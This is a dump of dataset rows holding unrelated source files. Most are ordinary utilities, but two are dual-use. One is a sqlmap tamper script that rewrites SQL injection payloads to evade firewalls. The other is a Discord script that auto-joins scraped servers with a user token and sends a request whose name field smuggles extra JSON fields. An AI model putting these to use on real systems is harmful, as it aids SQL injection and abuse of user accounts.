blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f731cfa199247a4181837c7dc0f6d3f01fe24c4e | 67be7acadeac8d44affc1810e68e3d83750e2d9b | /minning-util-codes/src/divide-in-intervals.py | b184aaeff840a650bd988b8dc3f628fe2dcdb3bf | [] | no_license | jordaos/text-minning | d8b869e8738513a33df942681d00abb481a7966a | c44a73f548f977ee02ab5ed3c56c7e6a86234025 | refs/heads/master | 2021-04-12T05:19:27.705194 | 2018-03-24T15:42:07 | 2018-03-24T15:42:07 | 125,797,549 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,559 | py | import sqlite3
import sys
import os
from columns import Columns
from subprocess import call, check_output
from cd import cd
PROJECT = ''
if len(sys.argv) > 1:
PROJECT = sys.argv[1]
else:
print 'Give parameter (project name)'
sys.exit()
PATH = 'DBs/' + PROJECT
DB = PATH + "/" + PROJECT + '.sqlite'
def have_twohundred_commits(sha, lastVersionHave):
    """Return True when checking out *sha* lands on a new ~200-commit interval.

    Side effects: checks out *sha* in the project clone, counts its commits
    via the external Ruby helper, then hard-resets the clone back to master.
    The checkout/count/reset sequence is order-sensitive -- do not reorder.
    """
    with cd("projects/" + PROJECT):
        call(["git", "checkout", sha])
        # Commit count of this revision as reported by the Ruby helper.
        qtdCommits = int(check_output(["ruby", "./../../src/count-commits.rb", "./../../projects/" + PROJECT]))
        # Restore the working tree before returning, whatever the outcome.
        call(["git", "reset", "--hard", "master"])
        # Either we sit exactly on a 200-commit boundary beyond the last
        # captured version, or we overshot a whole interval.
        if (((qtdCommits % 200) == 0 and qtdCommits > lastVersionHave) or (qtdCommits > lastVersionHave + 200)):
            return True
    return False
def save_db(n):
    """Create (if needed) the sqlite file for part *n* and fill it via gitlog.rb.

    The database lives at PATH/parts/<n>_part/<n>_part.sqlite; the external
    Ruby script performs the actual log extraction into that file.
    """
    database = "%s/parts/%i_part/%i_part.sqlite" % (PATH, n, n)
    if not os.path.exists(database):
        parent = os.path.dirname(database)
        # BUG FIX: os.makedirs() raises OSError when the directory already
        # exists (e.g. after a partial earlier run); only create it if missing.
        if not os.path.isdir(parent):
            os.makedirs(parent)
        # Touch an empty database file for the Ruby script to populate.
        open(database, "w+").close()
    call(["ruby", "src/gitlog.rb", database, "projects/" + PROJECT])
    return
# Walk the commit history, snapshotting a database part roughly every
# 200 commits of the target project.
conn = sqlite3.connect(DB)
cursor = conn.cursor()
cursor.execute("SELECT * FROM commits;")
commits = cursor.fetchall()
i = len(commits) - 1   # start from the last row of the commits table
n = 1                  # snapshot (part) counter
lastVersionHave = 0    # commit count captured by the previous snapshot
while i > 0:
    i -= 50  # coarse 50-commit jump, then refine one commit at a time below
    # NOTE(review): commits[i] is evaluated before the ``i < 0`` guard, so a
    # negative index wraps around to the other end of the list -- confirm.
    while (have_twohundred_commits(commits[i][Columns.SHA.value], lastVersionHave) == False):
        if i < 0:
            break
        print(i)
        i -= 1
    with cd("projects/" + PROJECT):
        call(["git", "checkout", commits[i][Columns.SHA.value]])
        # Remember how many commits this snapshot covers.
        lastVersionHave = int(check_output(["ruby", "./../../src/count-commits.rb", "./../../projects/" + PROJECT]))
    save_db(n)
n += 1 | [
"jordao05@hotmail.com"
] | jordao05@hotmail.com |
50c29638c8cd749a331b847e30f6ddf9e828d468 | 7ee15347ff755880ee3fec124b7a91faf112644c | /firstpage.py | 3331ce8b58ee39f798f36ea1b28aeb6304386959 | [] | no_license | DurgaSaiSudheerGubbala/FACE-RECOGNITION-ATTENDENCE-SYSTEM | ab6a7a8380f2390399c392e2ddab6c2881450e66 | 0783027d2062edc2a01ea91aec73f313d4e39d38 | refs/heads/main | 2023-02-06T05:44:15.164210 | 2020-12-23T02:38:08 | 2020-12-23T02:38:08 | 323,781,965 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,107 | py | #import module from tkinter for UI
from tkinter import *
from playsound import playsound
import os
from datetime import datetime;
#creating instance of TK
root=Tk()
root.configure(background="white")
#root.geometry("300x300")
# --- Button callbacks for the attendance UI --------------------------------

def function1():
    # Launch the face-dataset capture script in a child process.
    os.system("py dataset_capture.py")

def function2():
    # Train the recognizer on the captured dataset.
    os.system("py training_dataSet.py")

def function3():
    # Run recognition + attendance marking, then play a confirmation sound.
    os.system("py recognizer.py")
    playsound('sound.mp3')

def function5():
    # Open the developers page in the default browser.
    os.startfile(os.getcwd()+"/developers/diet1frame1first.html");

def function6():
    # Close the main window and end the application.
    root.destroy()

def attend():
    # Open today's attendance CSV (file name carries the current date).
    os.startfile(os.getcwd()+"/firebase/attendance_files/attendance"+str(datetime.now().date())+'.csv')
#stting title for the window
root.title("AUTOMATIC ATTENDANCE MANAGEMENT USING FACE RECOGNITION")
#creating a text label
Label(root, text="FACE RECOGNITION ATTENDANCE SYSTEM",font=("times new roman",20),fg="white",bg="maroon",height=2).grid(row=0,rowspan=2,columnspan=2,sticky=N+E+W+S,padx=5,pady=5)
#creating first button
Button(root,text="Create Dataset",font=("times new roman",20),bg="#0D47A1",fg='white',command=function1).grid(row=3,columnspan=2,sticky=W+E+N+S,padx=5,pady=5)
#creating second button
Button(root,text="Train Dataset",font=("times new roman",20),bg="#0D47A1",fg='white',command=function2).grid(row=4,columnspan=2,sticky=N+E+W+S,padx=5,pady=5)
#creating third button
Button(root,text="Recognize + Attendance",font=('times new roman',20),bg="#0D47A1",fg="white",command=function3).grid(row=5,columnspan=2,sticky=N+E+W+S,padx=5,pady=5)
#creating attendance button
Button(root,text="Attendance Sheet",font=('times new roman',20),bg="#0D47A1",fg="white",command=attend).grid(row=6,columnspan=2,sticky=N+E+W+S,padx=5,pady=5)
Button(root,text="Developers",font=('times new roman',20),bg="#0D47A1",fg="white",command=function5).grid(row=8,columnspan=2,sticky=N+E+W+S,padx=5,pady=5)
Button(root,text="Exit",font=('times new roman',20),bg="maroon",fg="white",command=function6).grid(row=9,columnspan=2,sticky=N+E+W+S,padx=5,pady=5)
root.mainloop()
| [
"noreply@github.com"
] | noreply@github.com |
6fcd77974cc305566c9496941a87ef64cb688e50 | 66fda6586a902f8043b1f5e9532699babc7b591a | /lib_openshift/models/v1_deployment_trigger_image_change_params.py | cdb5495ce392554744c8473da2b748a72362bdae | [
"Apache-2.0"
] | permissive | chouseknecht/lib_openshift | 86eff74b4659f05dfbab1f07d2d7f42b21e2252d | 02b0e4348631e088e72a982a55c214b30a4ab9d9 | refs/heads/master | 2020-12-11T05:23:17.081794 | 2016-07-28T20:15:39 | 2016-07-28T20:15:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,799 | py | # coding: utf-8
"""
OpenAPI spec version:
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class V1DeploymentTriggerImageChangeParams(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
operations = [
]
def __init__(self, automatic=None, container_names=None, _from=None, last_triggered_image=None):
"""
V1DeploymentTriggerImageChangeParams - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'automatic': 'bool',
'container_names': 'list[str]',
'_from': 'V1ObjectReference',
'last_triggered_image': 'str'
}
self.attribute_map = {
'automatic': 'automatic',
'container_names': 'containerNames',
'_from': 'from',
'last_triggered_image': 'lastTriggeredImage'
}
self._automatic = automatic
self._container_names = container_names
self.__from = _from
self._last_triggered_image = last_triggered_image
@property
def automatic(self):
"""
Gets the automatic of this V1DeploymentTriggerImageChangeParams.
Automatic means that the detection of a new tag value should result in a new deployment.
:return: The automatic of this V1DeploymentTriggerImageChangeParams.
:rtype: bool
"""
return self._automatic
@automatic.setter
def automatic(self, automatic):
"""
Sets the automatic of this V1DeploymentTriggerImageChangeParams.
Automatic means that the detection of a new tag value should result in a new deployment.
:param automatic: The automatic of this V1DeploymentTriggerImageChangeParams.
:type: bool
"""
self._automatic = automatic
@property
def container_names(self):
"""
Gets the container_names of this V1DeploymentTriggerImageChangeParams.
ContainerNames is used to restrict tag updates to the specified set of container names in a pod.
:return: The container_names of this V1DeploymentTriggerImageChangeParams.
:rtype: list[str]
"""
return self._container_names
@container_names.setter
def container_names(self, container_names):
"""
Sets the container_names of this V1DeploymentTriggerImageChangeParams.
ContainerNames is used to restrict tag updates to the specified set of container names in a pod.
:param container_names: The container_names of this V1DeploymentTriggerImageChangeParams.
:type: list[str]
"""
self._container_names = container_names
@property
def _from(self):
"""
Gets the _from of this V1DeploymentTriggerImageChangeParams.
From is a reference to an image stream tag to watch for changes. From.Name is the only required subfield - if From.Namespace is blank, the namespace of the current deployment trigger will be used.
:return: The _from of this V1DeploymentTriggerImageChangeParams.
:rtype: V1ObjectReference
"""
return self.__from
@_from.setter
def _from(self, _from):
"""
Sets the _from of this V1DeploymentTriggerImageChangeParams.
From is a reference to an image stream tag to watch for changes. From.Name is the only required subfield - if From.Namespace is blank, the namespace of the current deployment trigger will be used.
:param _from: The _from of this V1DeploymentTriggerImageChangeParams.
:type: V1ObjectReference
"""
self.__from = _from
@property
def last_triggered_image(self):
"""
Gets the last_triggered_image of this V1DeploymentTriggerImageChangeParams.
LastTriggeredImage is the last image to be triggered.
:return: The last_triggered_image of this V1DeploymentTriggerImageChangeParams.
:rtype: str
"""
return self._last_triggered_image
@last_triggered_image.setter
def last_triggered_image(self, last_triggered_image):
"""
Sets the last_triggered_image of this V1DeploymentTriggerImageChangeParams.
LastTriggeredImage is the last image to be triggered.
:param last_triggered_image: The last_triggered_image of this V1DeploymentTriggerImageChangeParams.
:type: str
"""
self._last_triggered_image = last_triggered_image
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"jdetiber@redhat.com"
] | jdetiber@redhat.com |
2efe378579a32f494f6942fa0ac13a700a233957 | cffee94b843fff699f68eaae972ed829858fbb0d | /typings/mediafile/mutagen/mp3/__init__.pyi | da26b2285df4dd3b5373082919fadc979a486824 | [
"MIT"
] | permissive | Josef-Friedrich/phrydy | 3b5fae00d3d7210821dc9037d00f9432e1df3c2d | c6e17e8b9e24678ec7672bff031d0370bfa8b6f8 | refs/heads/main | 2023-08-25T12:11:47.333984 | 2023-08-08T14:50:08 | 2023-08-08T14:50:08 | 66,490,323 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,255 | pyi | """
This type stub file was generated by pyright.
"""
from __future__ import division
from functools import partial
from io import BytesIO
from mutagen._util import BitReader, cdata, iterbytes
"""
http://www.codeproject.com/Articles/8295/MPEG-Audio-Frame-Header
http://wiki.hydrogenaud.io/index.php?title=MP3
"""
class LAMEError(Exception): ...
class LAMEHeader:
"""http://gabriel.mp3-tech.org/mp3infotag.html"""
vbr_method = ...
lowpass_filter = ...
quality = ...
vbr_quality = ...
track_peak = ...
track_gain_origin = ...
track_gain_adjustment = ...
album_gain_origin = ...
album_gain_adjustment = ...
encoding_flags = ...
ath_type = ...
bitrate = ...
encoder_delay_start = ...
encoder_padding_end = ...
source_sample_frequency_enum = ...
unwise_setting_used = ...
stereo_mode = ...
noise_shaping = ...
mp3_gain = ...
surround_info = ...
preset_used = ...
music_length = ...
music_crc = ...
header_crc = ...
def __init__(self, xing, fileobj) -> None:
"""Raises LAMEError if parsing fails"""
...
def guess_settings(self, major, minor):
"""Gives a guess about the encoder settings used. Returns an empty
string if unknown.
The guess is mostly correct in case the file was encoded with
the default options (-V --preset --alt-preset --abr -b etc) and no
other fancy options.
Args:
major (int)
minor (int)
Returns:
text
"""
...
@classmethod
def parse_version(cls, fileobj):
"""Returns a version string and True if a LAMEHeader follows.
The passed file object will be positioned right before the
lame header if True.
Raises LAMEError if there is no lame version info.
"""
...
class XingHeaderError(Exception): ...
class XingHeaderFlags:
FRAMES = ...
BYTES = ...
TOC = ...
VBR_SCALE = ...
class XingHeader:
frames = ...
bytes = ...
toc = ...
vbr_scale = ...
lame_header = ...
lame_version = ...
lame_version_desc = ...
is_info = ...
def __init__(self, fileobj) -> None:
"""Parses the Xing header or raises XingHeaderError.
The file position after this returns is undefined.
"""
...
def get_encoder_settings(self): # -> Literal['']:
"""Returns the guessed encoder settings"""
...
@classmethod
def get_offset(cls, info): # -> Literal[36, 21, 13]:
"""Calculate the offset to the Xing header from the start of the
MPEG header including sync based on the MPEG header's content.
"""
...
class VBRIHeaderError(Exception): ...
class VBRIHeader:
version = ...
quality = ...
bytes = ...
frames = ...
toc_scale_factor = ...
toc_frames = ...
toc = ...
def __init__(self, fileobj) -> None:
"""Reads the VBRI header or raises VBRIHeaderError.
The file position is undefined after this returns
"""
...
@classmethod
def get_offset(cls, info): # -> Literal[36]:
"""Offset in bytes from the start of the MPEG header including sync"""
...
| [
"josef@friedrich.rocks"
] | josef@friedrich.rocks |
937206a203bb423de0c7d72e23c6038ff821b56e | 33491a09da629999c84f11ed10543cb6de425221 | /final.py | bdfccf9101ffdfa2176e9668abeb5dba728fef2d | [] | no_license | lebomashatola/CS50W | e4559ec1894fadaaa8a2fe88c3ec693e7437f2c2 | 7abbcb3243c5e3227879c993b993cda271c724db | refs/heads/master | 2020-04-14T16:37:31.262458 | 2019-02-12T10:19:55 | 2019-02-12T10:19:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,107 | py | import pandas as pd
import numpy as np
#Creates new sig dataset with gene name added
class read_csv:
    """Joins the significance dataframe with its gene names, de-duplicated.

    NOTE(review): other parts of this script instantiate ``read_csv()`` with
    no arguments, which will raise TypeError because __init__ requires
    *sig* and *names* -- confirm the intended call sites.
    """

    def __init__(self, sig, names):
        # Significance dataframe and the gene-name column to re-attach.
        self.sig = sig
        self.gene_names = names

    def out_csv(self):
        """Return the significance frame with 'Gene Name' re-attached, deduped."""
        print(self.sig.columns)
        self.sig = self.sig.drop([' Gene Name'], axis=1)
        # Inner join keeps only rows present in both frames.
        sig_genes = pd.concat([self.gene_names, self.sig], axis=1, join='inner')
        sig_genes = sig_genes.drop_duplicates(subset='Gene Name')
        return sig_genes
#upregulated genes
class up_regulated:
    """Extracts, ranks, and exports the up-regulated genes.

    NOTE(review): __init__ references a bare name ``sig`` that is never
    defined at module scope -- instantiation will raise NameError.
    """

    def __init__(self, up_reg):
        self.up_reg = up_reg
        self.sig = sig  # BUG?: ``sig`` is undefined here

    def up_regulated(self):
        """Write up_reg.csv / up_lst.csv and return genes sorted by fold change."""
        up_reg_genes = pd.read_csv('up.csv')
        read_in = read_csv()  # BUG?: read_csv.__init__ requires (sig, names)
        new = read_in.out_csv()  # NOTE(review): ``new`` is never used
        # Keep only probes whose name appears in the up-regulated gene list.
        up_regulate = self.sig.loc[self.sig['Probe Set Name'].
                                   isin(self.up_reg['Gene Name'])]
        # Strongest up-regulation (largest log2 fold change) first.
        up_reg_genes = up_regulate.sort_values(by=' Fold Change (log2)',
                                               ascending=False)
        up_regulate.to_csv('up_reg.csv ', index=False)  # NOTE(review): trailing space in filename
        up_list = up_reg_genes['Gene Name']
        up_list = up_list.to_csv('up_lst.csv', index=False, header=True)
        return up_reg_genes
#down regulated genes
class down_regulated:
    """Extracts, ranks, and exports the down-regulated genes from down.csv."""

    def __init__(self):
        # Gene list of known down-regulated candidates.
        self.down_reg = pd.read_csv('down.csv')

    def down_regulated(self):
        """Write down_reg.csv / down_lst.csv and return genes sorted ascending."""
        self.down_reg = self.down_reg['Gene Name'].tolist()
        read_in = read_csv()  # BUG?: read_csv.__init__ requires (sig, names)
        new = read_in.out_csv()
        down_regulate = new.loc[new['Probe Set Name'].isin(self.down_reg)]
        down_regulate = down_regulate.drop_duplicates(subset="Gene Name")
        # Most strongly down-regulated (most negative fold change) first.
        down_regulated = down_regulate.sort_values(by=' Fold Change (log2)',
                                                   ascending=True)
        down_regulate.to_csv('down_reg.csv', index=False)
        down_list = down_regulated['Gene Name']
        down_list = down_list.to_csv('down_lst.csv', index=False,
                                     header='Gene Name')
        return down_regulated
#searching through resistant genes
class resistant_genes:
    """Cross-references up-regulated genes against two resistance-gene lists."""

    def __init__(self):
        # Two independent sources of known resistance genes.
        self.resis = pd.read_csv('resistant_genes.tsv', sep='\t')
        self.resis2 = pd.read_excel('resis_genes_2.xlsx')

    def search_genes(self):
        """Write the resistant-gene CSVs and return the merged, deduped frame."""
        res = self.resis['search_term']
        res.sort_values(ascending=True)  # NOTE(review): result discarded -- no-op as written
        resis_gene = res.to_csv('resistant_genes.csv', index=False,
                                header=['Gene Name'])
        # Round-trip through CSV to normalise, then drop duplicates.
        res_genes = pd.read_csv('resistant_genes.csv')
        res_genes = res_genes.drop_duplicates()
        res_genes.to_csv('resistant_genes.csv', index=False)
        new = pd.read_csv('up_reg.csv')
        # Matches against each resistance list, then the union of both.
        resis_genes = new.loc[new['Gene Name'].isin(res_genes['Gene Name'])]
        resis_genes2 = new.loc[new['Gene Name'].isin(self.resis2['Gene'])]
        resis_genes_final = pd.concat([resis_genes, resis_genes2],
                                      ignore_index=True)
        resis_genes_final = resis_genes_final.drop_duplicates()
        list = resis_genes_final['Gene Name']  # NOTE(review): shadows builtin ``list``
        list.to_csv('resistant_genes.csv', index=False, header=['Gene Name'])
        up_regulate = resis_genes_final.sort_values(by=' Fold Change (log2)',
                                                    ascending=False)  # NOTE(review): unused
        resis_genes_final.to_csv('resistant_gene_list.csv', index=False)
        return resis_genes_final
#searching up regulated genes
class gene_search:
    """Interactive lookup of user-supplied genes in the up-regulated list."""

    def __init__(self):
        self.genes = pd.read_csv('up_lst.csv')
        # Whitespace-separated gene symbols, upper-cased to match the list.
        self.search = list(map(str,
                               input('Enter Genes to search: ').upper().split()))

    def search_into(self):
        """Print 'present'/'absent' for each requested gene."""
        for gene in self.search:
            a = gene in self.genes.values
            if a is True:  # NOTE(review): plain ``if a:`` would be idiomatic
                print(gene, 'present')
            else:
                print(gene, 'absent')
if __name__ == '__main__':
    # Run the full gene-analysis pipeline end-to-end.
    a = read_csv()  # BUG?: read_csv.__init__ requires (sig, names)
    a.out_csv()
    b = up_regulated()  # BUG?: __init__ requires up_reg and references undefined ``sig``
    b.up_regulated()
    c = down_regulated()
    c.down_regulated()
    d = resistant_genes()
    d.search_genes()
    e = gene_search()
    e.search_into()
| [
"lm@Lebos-MacBook-Air.local"
] | lm@Lebos-MacBook-Air.local |
be29ecfaa46d89bbd1ee4b1db0e5d9408aabbcd4 | e9fead57eac4217ab9be524acdaedbb5d850fd57 | /main.py | 992c758c3ab6078ad5623aa6b2f413081355d222 | [] | no_license | DAMIOSKIDEV/GiveawayNitroJoiner | e9d2587e2867d4bedd0df44f2e7bea0b83067dac | 6d706126808a5cc72c6fe24da9025f1f439a32c1 | refs/heads/master | 2022-12-07T05:19:07.201818 | 2020-03-26T04:47:45 | 2020-03-26T04:47:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,704 | py | import requests, re, time, random
from colorama import init, Fore
init(convert=True)
def start():
urls = ["https://discordservers.me/servers/search?term=Nitro&page=", "https://discordservers.me/servers/search?term=Giveaway&page="]
numb = 1
session = requests.Session()
print(f"[{Fore.CYAN}>{Fore.RESET}] Input Discord Token")
token = input(" > ")
session.put(f"https://discordapp.com/api/v6/users/@me/connections/skype/{random.randint(1, 10)}", json={ "name": 'icewallowcum,"visibility": 1, "verified": True },headers={"Authorization": token})
while True:
if numb < 100:
for url in urls:
response = session.get(url + str(numb))
if response.status_code != 404:
regex = re.search("https(:)\/\/discord.gg\/[a-zA-Z0-9]+", response.text)
if regex:
code = str(regex.group()).split("/")[3]
headers = {
"Authorization": token
}
inviteResp = session.post(f"https://discordapp.com/api/v6/invites/{code}", headers=headers).json()
try:
if inviteResp["guild"]["name"]:
print(f"[{Fore.CYAN}Success{Fore.RESET}] Joined the server: {inviteResp['guild']['name']}")
except:
pass
else:
pass
elif response.status_code == 404:
break
else:
break
numb+=1
input("")
if __name__ == "__main__":
start()
| [
"noreply@github.com"
] | noreply@github.com |
f9242da26ab0e85261149acc3935789753a44160 | 0cafca9e27e70aa47b3774a13a537f45410f13f7 | /idb/ipc/push.py | c7f6d1ab8f6e77317e6d081e0655d31ebf0c16a5 | [
"MIT"
] | permissive | fakeNetflix/facebook-repo-idb | 18b67ca6cfa0edd3fa7b9c4940fec6c3f0ccfa73 | eb4ed5a7dc4a14b224a22e833294d7366fe4725e | refs/heads/master | 2023-01-05T13:19:40.755318 | 2019-08-16T15:23:45 | 2019-08-16T15:25:00 | 203,098,477 | 1 | 0 | MIT | 2023-01-04T07:33:09 | 2019-08-19T04:31:16 | Objective-C | UTF-8 | Python | false | false | 1,039 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
from idb.common.stream import stream_map
from idb.common.tar import generate_tar
from idb.grpc.idb_pb2 import Payload, PushRequest, PushResponse
from idb.grpc.stream import Stream, drain_to_stream
from idb.grpc.types import CompanionClient
async def daemon(
    client: CompanionClient, stream: Stream[PushResponse, PushRequest]
) -> None:
    """Proxy a push request from the daemon's client through to the companion.

    The first message (the push header) is forwarded verbatim.  For a local
    companion the remaining requests are streamed through unchanged; for a
    remote one the referenced files are tarred locally and sent as raw data
    chunks instead.
    """
    async with client.stub.push.open() as companion:
        # Forward the initial request before deciding how to send payloads.
        await companion.send_message(await stream.recv_message())
        if client.is_local:
            generator = stream
        else:
            # Collect the requested file paths, tar them, and wrap each tar
            # chunk back into a PushRequest payload.
            paths = [request.payload.file_path async for request in stream]
            generator = stream_map(
                generate_tar(paths=paths),
                lambda chunk: PushRequest(payload=Payload(data=chunk)),
            )
        response = await drain_to_stream(
            stream=companion, generator=generator, logger=client.logger
        )
        # Relay the companion's final response back to the caller.
        await stream.send_message(response)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
181269644d8602fc2dcb673b30857f2da8b2b11f | 6deafbf6257a5c30f084c3678712235c2c31a686 | /Toolz/sqlmap/tamper/least.py | 53a8a6aadefe283a268fd3ad7a0c5fd1f51f2a67 | [
"Unlicense",
"LicenseRef-scancode-generic-cla",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-proprietary-license",
"GPL-2.0-only",
"LicenseRef-scancode-commercial-license",
"LicenseRef-scancode-other-permissive"
] | permissive | thezakman/CTF-Heaven | 53fcb4a72afa821ad05d8cc3b309fb388f958163 | 4b52a2178922f1502ab00fa8fc156d35e1dc653f | refs/heads/master | 2023-04-05T18:20:54.680378 | 2023-03-21T13:47:45 | 2023-03-21T13:47:45 | 167,290,879 | 182 | 24 | Unlicense | 2022-11-29T21:41:30 | 2019-01-24T02:44:24 | Python | UTF-8 | Python | false | false | 1,126 | py | #!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
    # This tamper script needs no extra runtime dependencies.
    pass
def tamper(payload, **kwargs):
    """
    Replaces greater than operator ('>') with 'LEAST' counterpart

    Tested against:
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls that
          filter the greater than character
        * The LEAST clause is a widespread SQL command. Hence, this
          tamper script should work against majority of databases

    >>> tamper('1 AND A > B')
    '1 AND LEAST(A,B+1)=B+1'
    """

    # Empty/None payloads pass through untouched.
    if not payload:
        return payload

    match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)
    if not match:
        return payload

    # 'A > B' becomes 'LEAST(A,B+1)=B+1' -- true exactly when A > B.
    prefix, lhs, rhs = match.group(1), match.group(3), match.group(4)
    rewritten = "%sLEAST(%s,%s+1)=%s+1" % (prefix, lhs, rhs, rhs)
    return payload.replace(match.group(0), rewritten)
"thezakman@ctf-br.org"
] | thezakman@ctf-br.org |
31d7c339cd134320969c186fadcd97cfb4c7b15e | 0a830ace2253924ca216f1bcca5a61327a710d78 | /MainWebApp/urls.py | 7b329d32f937967400a6f7cb69c1386abcedafd5 | [] | no_license | AyushSolanki-17/HealthGaurd-Server | 39f0161e54f3a70d2014aafc723a6a52217277d3 | 64661afecbd226c0962ff7181c6038690b2fb0b6 | refs/heads/main | 2023-05-04T10:14:17.024867 | 2021-05-25T13:59:26 | 2021-05-25T13:59:26 | 370,714,847 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 144 | py | from django.urls import path
from . import views
app_name = 'MainWebApp'
urlpatterns = [
path('', views.HomeView.as_view(), name='home')
]
| [
"ayush17solanki@gmail.com"
] | ayush17solanki@gmail.com |
a1c79de8e2240910b9f6374bba5cfb966fee8daf | f2e97531cb0e01a8cfc636eda7d3e56873c33af7 | /python/Alura/data science/numpy/atr_metodos.py | e64426b2ad71b0cfe57ee5cf36136f770de6562c | [
"MIT"
] | permissive | alifoliveira/rep-estudos | c0c13153ff0728090ffa2102d159dbff2e750444 | 73ffb7cfe77890f6cca8b5447db332f88454ef7e | refs/heads/master | 2023-01-05T11:57:29.335267 | 2020-11-04T01:54:08 | 2020-11-04T01:54:08 | 278,215,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,202 | py | import numpy as np
dados = np.array([[44410., 5712., 37123., 0., 25757.],
[2003, 1991, 1990, 2019, 1006]])
cont = np.arange(10)
print(dados.shape) # retorna quantidade de linhas e colunas
print(dados.ndim) # retorna a quantidade de dimnensões do array
print(dados.size) # retorna o numeros de elementos do array
print(dados.dtype) # retorna o tipo de dados do array
print(dados.T) # retorna o array transposto, coverte linhas em colunas e vice versa
print(dados.transpose) # mesma função do array.T
print(dados.tolist) # converte o array para lista do python
print(cont.reshape((5, 2), order='C')) # retorna array contendo uma nova forma, order='C', order='F
km = [44410, 5712, 37123, 0, 25757]
anos = [2003, 1991, 1990, 2019, 2006]
info_carros = km + anos # concatenação das listas
print(info_carros)
print(np.array(info_carros).reshape((5, 2), order='F')) # concatenação com reshape
dados_new = dados.copy() # cria uma cópia do array
dados_new.resize((3, 5), refcheck=False) # adiciona mais uma linha(ou coluna) no array | refcheck ignora referencia
print(dados_new)
dados_new[2] = dados_new[0] / (2019 - dados_new[1])
| [
"53924906+alifoliveira@users.noreply.github.com"
] | 53924906+alifoliveira@users.noreply.github.com |
224712607926f64e14c27334b837bc69b83fd5f4 | 54e6f5ef63d9d48af97321c2cc1fe83e4315de65 | /rkcodingmusic.py | 6639fc9c28e166a6c44c51aadeec4fe8b54e02f8 | [] | no_license | Harsishest/Videos | 70de7947a1b259bbafef7019645eedbe01014093 | 7556839ecf9c1781a7bae899affdcf4461337e26 | refs/heads/master | 2023-04-24T19:12:47.332613 | 2021-04-29T13:56:36 | 2021-04-29T13:56:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,170 | py | import discord
from discord.ext import commands, tasks
from discord.voice_client import VoiceClient
import youtube_dl
from random import choice
youtube_dl.utils.bug_reports_message = lambda: ''
ytdl_format_options = {
'format': 'bestaudio/best',
'outtmpl': '%(extractor)s-%(id)s-%(title)s.%(ext)s',
'restrictfilenames': True,
'noplaylist': True,
'nocheckcertificate': True,
'ignoreerrors': False,
'logtostderr': False,
'quiet': True,
'no_warnings': True,
'default_search': 'auto',
'source_address': '0.0.0.0' # bind to ipv4 since ipv6 addresses cause issues sometimes
}
ffmpeg_options = {
'options': '-vn'
}
ytdl = youtube_dl.YoutubeDL(ytdl_format_options)
class YTDLSource(discord.PCMVolumeTransformer):
    """Volume-adjustable audio source wrapping FFmpeg output for a
    youtube-dl resolved URL."""

    def __init__(self, source, *, data, volume=0.5):
        super().__init__(source, volume)
        self.data = data
        # Convenience fields pulled from the youtube-dl info dict.
        self.title = data.get('title')
        self.url = data.get('url')

    @classmethod
